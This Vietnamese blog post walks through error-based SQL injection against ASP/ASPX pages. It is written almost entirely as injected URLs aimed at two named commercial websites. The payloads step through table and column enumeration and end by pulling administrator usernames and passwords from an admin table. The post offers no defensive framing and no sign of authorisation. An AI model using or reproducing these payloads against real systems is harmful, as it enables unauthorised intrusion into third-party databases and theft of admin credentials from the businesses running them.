Top Ad unit 728 × 90

Lastet News

random
Home Hacking Hack SQLi cho aspx

Hack SQLi cho aspx




 victim http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' 
Thêm '  để check lỗi.
Tìm tên các bảng
http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 table_name from information_schema.tables))
đc bảng 'D99_Tmp'
 Tiếp tục
http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 table_name from information_schema.tables where table_name not in ('D99_Tmp')))

 http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 table_name from information_schema.tables where table_name not in ('D99_Tmp', 'dtproperties')))

 http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 table_name from information_schema.tables where table_name not in ('D99_Tmp', 'dtproperties', 'tblAdmin' )))

 Tìm các cột trong tblAdmin
http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 column_name from information_schema.columns where table_name = 'tblAdmin'))

http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 column_name from information_schema.columns where table_name = 'tblAdmin' and column_name not in ('AID')))

http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 column_name from information_schema.columns where table_name = 'tblAdmin' and column_name not in ('AID','ALogin')))

Lấy thông tin user

http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 ALogin from tblAdmin))

http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 ALogin from tblAdmin where ALogin not in ('Administrator')))

 Lấy mật khẩu đăng nhập
http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 APass from tblAdmin ))  // mật khẩu của Administrator

http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 APass from tblAdmin where ALogin not in ('Administrator') ))  //mật khẩu của user thứ 2.









http://www.hienshop.vn/ProductDetail/1672/198 and 1=convert(int,@@version)/Default.aspx

 http://www.hienshop.vn/ProductDetail/1672/198 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tblCategory','tblComment','tblfooter','tbllienhe','tblLogo','tblNews','tblOrder','tblOrderDetail')))/Default.aspx

 http://www.hienshop.vn/ProductDetail/1672/198 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tblAdmin'))/Default.aspx

 http://www.hienshop.vn/ProductDetail/1672/198 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tblAdmin' and column_name not in ('AdminID','UserName','PassWord')))/Default.aspx
http://www.hienshop.vn/ProductDetail/1672/198 and 1=convert(int,(select top 1 UserName from tblAdmin))/Default.aspx
http://www.hienshop.vn/ProductDetail/1672/198 and 1=convert(int,(select top 1 PassWord from tblAdmin))/Default.aspx
Hack SQLi cho aspx Reviewed by Unknown on 17:06 Rating: 5

Tags :

About Huy Hùng (hungdh0x5e)

Number of Entries : 35

Đang là sinh viên năm 4 của KMA. Lĩnh vực hiện đang tìm hiểu: Android, Linux, Crypto

Không có nhận xét nào:

body{ margin-top:50px;} .menuBar{ width:100%; height:50px; display:block; position:absolute; top:0; left:0; } .logo{ float:left; } .nav{ float:right; margin-right:10px;} .nav ul li{ list-style:none; float:left; }

Đăng ký: Đăng Nhận xét (Atom)
All Rights Reserved by Huy Hùng - KMA © 2014 - 2015
Designed by JOJOThemes

Biểu mẫu liên hệ

Tên

Email *

Thông báo *

Được tạo bởi Blogger.